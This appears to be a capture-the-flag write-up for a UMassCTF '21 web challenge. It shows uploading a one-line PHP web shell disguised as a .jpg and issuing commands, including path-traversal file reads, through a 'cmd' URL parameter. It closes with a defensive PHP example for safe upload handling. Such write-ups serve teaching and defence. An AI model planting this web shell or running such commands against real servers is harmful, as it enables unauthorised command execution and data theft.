This is for the UMassCTF ’21 CTF.
Challenge Author: Cobchise#6969
For this challenge, we are provided the following information:

Here is the hint:

Going to the provided link, we get this page:

I quickly test an image upload and see how it works:

It uploaded the file and gave a link to see it. When I click the link to see it, it essentially prints the contents of the file as if it were text:

This tells me that I need to upload a PHP shell script:
I grab my favorite one-line PHP shell and upload it as a .php file:
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Okay, that didn’t work, so I change the extension to .jpg.
It took it:

When I click to see the “image” I get this:

Now I provide some commands as the expected “cmd” argument:
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=pwd

Beautiful! I have a working shell. After some poking around, I find the flag:
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=ls%20../../../home/hermit/flag

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=cat%20../../../home/hermit/flag/userflag.txt

UMASS{a_picture_paints_a_thousand_shells}
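
The defensive counterpart to the behaviour above, as an added example that is not the challenge's source code. It assumes show.php passed the stored file to include (consistent with the renamed .jpg executing as PHP); the function names, upload directory and ID format are hypothetical.

```php
<?php
// Added example, not the challenge's code. UPLOAD_DIR, the function names and
// the 16-hex-character ID format are assumptions made for illustration.
const UPLOAD_DIR = '/var/www/uploads';   // assumed path, ideally outside the web root

// Detected MIME type => extension the server is willing to store.
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

// Upload side: decide by file content, never by the client-supplied extension.
function store_upload(string $tmpPath): ?string
{
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!isset(ALLOWED[$mime]) || @getimagesize($tmpPath) === false) {
        return null;                      // a PHP script renamed to .jpg stops here
    }
    $name = bin2hex(random_bytes(8)) . '.' . ALLOWED[$mime];  // server-chosen name
    if (!move_uploaded_file($tmpPath, UPLOAD_DIR . '/' . $name)) {
        return null;
    }
    return $name;
}

// Display side: stream the bytes. include/require would hand the file to the
// PHP interpreter, which is what turns an uploaded file into code execution.
function show_upload(string $name): void
{
    // Strict allow-list on the name also rules out path traversal.
    if (!preg_match('/\A[0-9a-f]{16}\.(jpg|png|gif)\z/', $name)) {
        http_response_code(400);
        return;
    }
    $path = UPLOAD_DIR . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: ' . (new finfo(FILEINFO_MIME_TYPE))->file($path));
    header('X-Content-Type-Options: nosniff');
    header('Content-Length: ' . filesize($path));
    readfile($path);                      // raw bytes out, nothing is evaluated
}
```

A valid image that carries PHP in a comment field can still pass the content check, so the display side is the control that matters: the file is only ever read, never included.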